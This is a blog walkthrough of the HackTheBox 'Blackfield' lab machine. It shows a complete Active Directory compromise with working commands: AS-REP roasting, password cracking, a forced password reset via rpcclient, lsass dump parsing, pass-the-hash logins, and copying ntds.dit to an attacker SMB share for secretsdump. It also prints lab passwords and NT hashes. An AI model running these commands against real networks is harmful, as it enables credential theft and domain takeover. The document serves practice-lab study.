Where Notes Work
BLACKFIELD – HACKTHEBOX
This is the Write-up/Walkthrough of the BLACKFIELD Active Directory Machine from Hackthebox.
NMAP SCAN:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 00:47:22Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Domain: BLACKFIELD.LOCAL, BIOS NAME: DC01
Shares found on SMB:
smbclient -L 10.10.10.192
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Interacting with profiles$ share, found a list of empty directories, with username, copied all the output, saved it to a file named users.txt, and extracted the all names using awk.
cat users.txt | awk '{print $1}' > usernames.txt
Using the username, tried to check pre-auth using impacket tool GetNPUsers and I found the pre-auth hash of user support.
impacket-GetNPUsers blackfield.local/ -dc-ip 10.10.10.192 -usersfile usernames.txt -format hashcat -outputfile result.hash
Got the hash of support user.
Brute force the password using john and wordlist rockyou.txt
After, that used ldapsearch to enumerate more, but no luck, didn’t find anything.
It was long query result output of ldapsearch, didn’t find anything in it, looking forward.
After that, used bloodhound.py to enumerate domain with found credentials
/opt/BloodHound.py/bloodhound.py -u support -p '#00^BlackKnight' -d blackfield.local -v --zip -c All -ns 10.10.10.192
Set up the Bloodhound and upload the zip file, looking for the Shortest path from owned principle to user audit2020, found that support user can reset the password of audit2020 user.
Looking for, how to reset the password for user audit2020, found that I can reset the audit2020 password using rpcclient..
rpcclient -U support 10.10.10.192
Set up the new password.
rpcclient $> setuserinfo2
rpcclient $> setuserinfo2 audit2020 23 hacker@1337
After that I tried connecting to winrm using evil-winrm, but it was not working, checking for share access using these credentials, it was showing the access to the forensic share.
crackmapexec smb 10.10.10.192 -u audit2020 -p 'hacker@1337' --shares
dumping everything from the forensic share using smbclient
$ smbclient //10.10.10.192/forensic -U audit2020%'hacker@1337'
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
looking for files, found there is a memory dump of different processes, found this article to dump credentials from lsass.DMP file.
unzip the lsass.zip, make sure, that downloaded the full lsass.zip file, and used pypykatz to gather the clear text credentials.
pypykatz lsa minidump lsass.DMP
after dumping using pypykatz, find the NTLM hash of user svc_backup
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
after getting the hash of user svc_backup, logged in using evil-winrm using the PASS THE HASH technique, and got the user flag.
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
found that user svc_backup is in the “Backup Operators” group, which means the user can back up and restore files on the system.
net user svc_backup /domain
whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Creating Distributed Shell file and adding commands which will be used by diskshadow.
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
Converting .dsh file to DOS format.
unix2dos kunal.dsh
then upload the file using evil-winrm download functionality, and used diskshadow command to create a copy of C drive to new drive named F:
diskshadow /s kunal.dsh
diskshadow command successfully copied the C: drive to F: drive.
robocopy /B Z:\Windows\NTDS . ntds.dit
after that, tried to download ntds.dit file using the download functionality of winrm, but it was failing, so I started the smbserver using impacket-smbserver and copied the ntds.dit to my linux machine.
Starting the smb server on linux.
impacket-smbserver -smb2support share.
copying the ntds.dit file.
copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit
after that used secretsdump from impacket to dump the hashes from ntds.dit and system.hive, to dump the system file from registry.
reg save hklm\system system.hive
Downloaded the system.hive also to linux machine.
impacket-secretsdump -ntds ntds.dit -system system.hive local
after getting the hash of the administrator, used evil-winrm to connect to the administrator account using pass the hash method.
evil-winrm -u administrator -H "184fb5e5178480be64824d4cd53b99ee" -i 10.10.10.192
If you face any problems, let me know in the comment.